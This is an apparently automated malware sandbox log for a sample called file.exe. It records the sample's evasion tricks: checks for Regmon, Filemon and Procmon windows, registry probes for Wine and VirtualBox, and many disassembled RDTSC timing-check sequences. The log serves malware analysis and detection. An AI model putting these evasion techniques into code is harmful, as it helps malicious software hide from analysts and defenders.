Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 47423F second address: 474243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 474243 second address: 474249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 474249 second address: 474254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7704E143B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 473A53 second address: 473A7B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7704DD53B7h 0x00000008 jmp 00007F7704DD53B1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jne 00007F7704DD53A8h 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EBBAB second address: 5EBBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7704E143BDh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EBD44 second address: 5EBD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EBD4C second address: 5EBD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EBD51 second address: 5EBD79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AEh 0x00000007 jmp 00007F7704DD53B1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EC18E second address: 5EC1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143BFh 0x00000009 jmp 00007F7704E143C8h 0x0000000e jnp 00007F7704E143B6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F7704E143B6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EC1C8 second address: 5EC1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EC1CC second address: 5EC1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EC1D2 second address: 5EC1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F7704DD53ACh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EC1EC second address: 5EC1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EC354 second address: 5EC36E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEA1E second address: 5EEA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEA23 second address: 5EEA7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F7704DD53B9h 0x00000010 pop edi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007F7704DD53ADh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7704DD53B3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEA7C second address: 5EEA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEBAF second address: 5EEBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEBB3 second address: 5EEBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEBB9 second address: 5EEBBE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEBBE second address: 5EEC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 65047B14h 0x0000000e jmp 00007F7704E143BDh 0x00000013 push 00000003h 0x00000015 xor esi, dword ptr [ebp+122D364Dh] 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e mov dword ptr [ebp+122D1950h], edx 0x00000024 movzx esi, ax 0x00000027 popad 0x00000028 push 00000003h 0x0000002a mov ecx, 740EAB00h 0x0000002f push 5C5FB005h 0x00000034 jng 00007F7704E143C2h 0x0000003a jng 00007F7704E143BCh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEC93 second address: 5EECE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jno 00007F7704DD53A9h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F7704DD53A8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a jmp 00007F7704DD53B0h 0x0000002f mov ch, bh 0x00000031 call 00007F7704DD53A9h 0x00000036 pushad 0x00000037 jbe 00007F7704DD53ACh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EECE6 second address: 5EED09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F7704E143BFh 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jl 00007F7704E143B6h 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EED09 second address: 5EED5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7704DD53AFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F7704DD53B9h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b jmp 00007F7704DD53B8h 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EED5B second address: 5EED61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EED61 second address: 5EEDDC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jne 00007F7704DD53B4h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7704DD53A8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F7704DD53A8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 push 00000000h 0x0000004b add di, 983Fh 0x00000050 push 00000003h 0x00000052 call 00007F7704DD53A9h 0x00000057 jg 00007F7704DD53B4h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEDDC second address: 5EEDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEDE0 second address: 5EEDFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F7704DD53AFh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEDFA second address: 5EEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEE00 second address: 5EEE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEE0F second address: 5EEE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEE13 second address: 5EEE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEE17 second address: 5EEE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 jmp 00007F7704E143C9h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEE43 second address: 5EEE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7704DD53A6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnl 00007F7704DD53C2h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7704DD53B4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEE6F second address: 5EEEAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ecx, 349AA002h 0x0000000c lea ebx, dword ptr [ebp+1244E97Eh] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F7704E143B8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edx, dword ptr [ebp+122D37F1h] 0x00000032 push eax 0x00000033 push eax 0x00000034 pushad 0x00000035 push ecx 0x00000036 pop ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEF6F second address: 5EEFDB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ecx, dword ptr [ebp+122D388Dh] 0x0000000d push 00000003h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F7704DD53A8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jmp 00007F7704DD53B5h 0x00000030 push 00000003h 0x00000032 movzx edx, cx 0x00000035 mov esi, dword ptr [ebp+122D1DB7h] 0x0000003b call 00007F7704DD53A9h 0x00000040 push eax 0x00000041 push edx 0x00000042 jg 00007F7704DD53ACh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EEFDB second address: 5EF015 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7704E143CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7704E143C9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60DE5B second address: 60DE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60DE66 second address: 60DE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60E390 second address: 60E396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60E396 second address: 60E3B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F7704E143CDh 0x0000000c jmp 00007F7704E143C1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60E81C second address: 60E82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F7704DD53ACh 0x0000000b jc 00007F7704DD53A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60EB2B second address: 60EB30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60EF08 second address: 60EF18 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7704DD53A8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F664 second address: 60F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143BFh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F67B second address: 60F681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6118DA second address: 6118E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 613108 second address: 61310C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61310C second address: 613132 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7704E143C2h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 613132 second address: 61314D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704DD53B6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61314D second address: 613167 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7704E143BEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 613167 second address: 613185 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F7704DD53A6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F7704DD53ACh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 613185 second address: 613197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 613197 second address: 61319B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6132F3 second address: 6132F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6132F9 second address: 61330F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7704DD53A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007F7704DD53B4h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61502C second address: 615030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 615030 second address: 61505F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7704DD53BCh 0x0000000f jmp 00007F7704DD53B0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61505F second address: 615063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DAD12 second address: 5DAD2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F7704DD53ABh 0x0000000e jno 00007F7704DD53A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61B53E second address: 61B593 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7704E143B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F7704E143C7h 0x00000012 pop edx 0x00000013 jmp 00007F7704E143C3h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F7704E143BCh 0x00000022 popad 0x00000023 push esi 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pushad 0x00000027 popad 0x00000028 pop esi 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A9C9 second address: 61A9CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61ACA7 second address: 61ACB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61ACB5 second address: 61ACB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61ACB9 second address: 61ACCF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7704E143B6h 0x00000008 jo 00007F7704E143B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61ACCF second address: 61ACD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7704DD53A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AE3A second address: 61AE40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61B124 second address: 61B128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61B128 second address: 61B12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61B12E second address: 61B134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61B3EF second address: 61B3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61B3F5 second address: 61B419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F7704DD53B9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61D2B3 second address: 61D2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 xor dword ptr [esp], 4B2BC31Ah 0x0000000c or si, 31C5h 0x00000011 push 722BF0DAh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7704E143C8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61D2E3 second address: 61D2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61D2E9 second address: 61D2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61D6F0 second address: 61D6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61D7B8 second address: 61D7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61D9D9 second address: 61D9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61D9E1 second address: 61D9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61DE63 second address: 61DE67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61DEEB second address: 61DEF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61DFA7 second address: 61DFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61E087 second address: 61E08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E173 second address: 61E197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E197 second address: 61E19D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
